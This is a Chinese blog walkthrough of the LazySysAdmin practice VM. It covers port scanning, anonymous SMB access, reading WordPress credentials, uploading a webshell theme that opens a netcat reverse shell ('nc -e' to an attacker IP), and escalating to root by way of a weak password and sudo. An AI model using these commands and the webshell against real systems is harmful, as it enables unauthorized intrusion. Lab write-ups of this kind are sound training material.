首页 > 其他分享 >LazySysAdmin - WordPress拿立足点的标准流程

LazySysAdmin - WordPress拿立足点的标准流程

时间:2023-05-03 11:44:06浏览次数:35  
标签:shell 查看 sudo 立足点 WordPress wp php 目录 LazySysAdmin

主机发现

sudo nmap --min-rate 10000 -p- 192.168.xx.xx

渗透顺序:80,139/445/,22~3306

 139 445 samba的共享服务

3306 mysql 注入和配置文件相关的内容

sudo nmap -sT -sV -sT -O -p22,80,139,445,3306,6667

 对http进行渗透

目录爆破并访问页面查看页面提供源

sudo dirb -u http://xx

 对139/445进行smbclient无密码探测

sudo smbclient -L victim's ip

 对share$路径查看文件内容

sudo smbclient '\\192.168.95.134\share$'

 将所有内容下载下来

smb: \> mget *.*

发现有wordpress的目录,进入目录查看

cd wordpress 

ls

 下载配置文件和license.txt->用于精确定位wordpress的漏洞版本

get wp-config.php

get license.txt 

进入到其他目录 backnode_files目录中

ls查看目录文件看有没有什么异常的地方

 看到里面有一个特殊编码的jpg将他下载下来

get AAEAA table

再次初次筛选其他目录的文件

分别进入到wp test old 目录中并ls查看文件内容但是都为空,所以退出

 

退出后整理内容

分别查看文件包含什么

jpg可以使用binwalk查看是否隐藏其他文件,exiftool可以查看图片属性

cat 命令同时查看多个文件

发现一个弱口令12345

查看license.php可以看到wp的版本

查看wp-config.php看到了明文的用户名密码

保留两个敏感的账号和密码

进入到wp的管理端页面让它跳转登录(管理端页面的地址需要记住)

192.168.95.134/wordpress/wp-admin

跳转到登陆页面使用wpconfig里的明文账号密码登录

 拿shell

建立一个zip文件将一句话木马sh.php放入,wp后台的主题管理,上传主题,安装,后门路径则为wp-content/plugins/sh/sh.php

sh.php( nc -e 192.168.95.36 1234 &)

kali: nc -lvnp 1234

访问网站获得shell

 获取shell

权限分析

whoami  #查看权限

uname -a   #查看linux版本

dkpg -l | grep python  #查看是否有python数据包  返回dkpg not found 

1.尝试python pty获取更好的交互式命令行shell

python -c "import pty;pty.spawn('/bin/bash')"

2.尝试使用clear发现说term environment variable not set 

export term=xterm-color

在使用clear -成功

3.查看ip地址

ip a 

4.查看所在位置并渠道家目录查看flag文件

pwd 

cd /home/togie

5.查看网站下有没有什么敏感信息

cd /var/www/html

尝试能够通过弱口令12345登录到togie用户

su togie 12345 成功

 1.查看权限

sudo -l 

发现是all已经是全部shell

直接通过sudo /bin/bash进行提权得到root

去到root的家目录查看是否有flag

cd /root

ls -liah

cat proof.txt 发现flag

 

标签:shell,查看,sudo,立足点,WordPress,wp,php,目录,LazySysAdmin
From: https://www.cnblogs.com/lisenMiller/p/17368879.html

相关文章

  • 关于使用Wordpress搭建网站icon图标无法显示的问题
    我也是网上找资料,然后得到的是添加<linkrel="shortcuticon"href="你的图标url地址"type="image/x-icon">这行代码,但是还是没用,阴差阳错反而把wordpress后台那个的图标换成我的图标了,几经周折,我发现只要上传favicon.ico这个图片(最好命名为favicon)到根目录,然后在主题里不要添......
  • WordPress extended XML-RPC MetaWeblog API
    XML-RPCMetaWeblogAPI«WordPressCodexWordPress.orgWordPress.orgPluginsThemesPatternsLearnSupportDocumentationForumsNewsAboutGetInvolvedFivefortheFutureShowcaseMobileHostingOpenverseGetWordPressSearch......
  • wordpress插件:代码高亮显示并配置样式(SyntaxHighlighter Evolved 3.6.2 / wordpress
    一,安装插件:SyntaxHighlighterEvolved点击插件->安装插件->输入:SyntaxHighlighter进行搜索结果显示后,找到并进行安装,如图:安装第一个安装后的效果:二,安装插件后调整样式(行高):先找到样式文件路径,当前如下:/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/......
  • 设置wordpress:关闭底部默认的facebook等链接(wordpress 6.2)
    一,默认显示:如图:说明:刘宏缔的架构森林是一个专注架构的博客,地址:https://www.cnblogs.com/architectforest     对应的源码可以访问这里获取: https://github.com/liuhongdi/     或: https://gitee.com/liuhongdi说明:作者:刘宏缔邮箱:[email protected]......
  • 设置wordpress:设置标题字号大小(wordpress 6.2)
    一,未设置之前字号过大,如图:说明:刘宏缔的架构森林是一个专注架构的博客,地址:https://www.cnblogs.com/architectforest     对应的源码可以访问这里获取: https://github.com/liuhongdi/     或: https://gitee.com/liuhongdi说明:作者:刘宏缔邮箱:3711253......
  • 设置wordpress:隐藏 自豪地采用WordPress 链接(wordpress 6.2)
    一,未隐藏前的效果说明:刘宏缔的架构森林是一个专注架构的博客,地址:https://www.cnblogs.com/architectforest     对应的源码可以访问这里获取: https://github.com/liuhongdi/     或: https://gitee.com/liuhongdi说明:作者:刘宏缔邮箱:[email protected]......
  • 安装wordpress 6.2(php 7.4.2)
    一,得到安装包的下载地址:1,官网地址:https://cn.wordpress.org/ 如图:点击获取WordPress按钮2,在下载WordPress6.2按钮上右键,选择: 复制链接地址,复制的链接如下:https://cn.wordpress.org/latest-zh_CN.zip说明:刘宏缔的架构森林是一个专注架构的博客,地址......
  • CDN加速WordPress触发CORS导致跨域加载失败
    这两天折腾CDN加速来提升自己博客的访问速度,用的阿里云CDN加速方案;使用的时候发现一个问题,部分资源CDN加速失败,原因是触发了CORS,因为CDN加速网址与博客网址不一致引发的跨域请求不成功;从报错中发现Off与Tff字体加载报错:(index):1AccesstoFontat'http://cdn.5yun.org/wp-conte......
  • wordpress产品排序
    updatewp_postssetmenu_order=100wherepost_type='product';updatewp_postssetmenu_order=5wherepost_name='r-m-williams-craftsman-boot_792c678e';updatewp_postssetmenu_order=10wherepost_name='r-m-williams-rod-polo_ee292998......
  • 本地图文直接复制到WordPress编辑器中
    ​ 在之前在工作中遇到在富文本编辑器中粘贴图片不能展示的问题,于是各种网上扒拉,终于找到解决方案,在这里感谢一下知乎中众大神以及TheViper。通过知乎提供的思路找到粘贴的原理,通过TheViper找到粘贴图片的方法。其原理为一下步骤:监听粘贴事件;【用于插入图片】获取光标位置;【......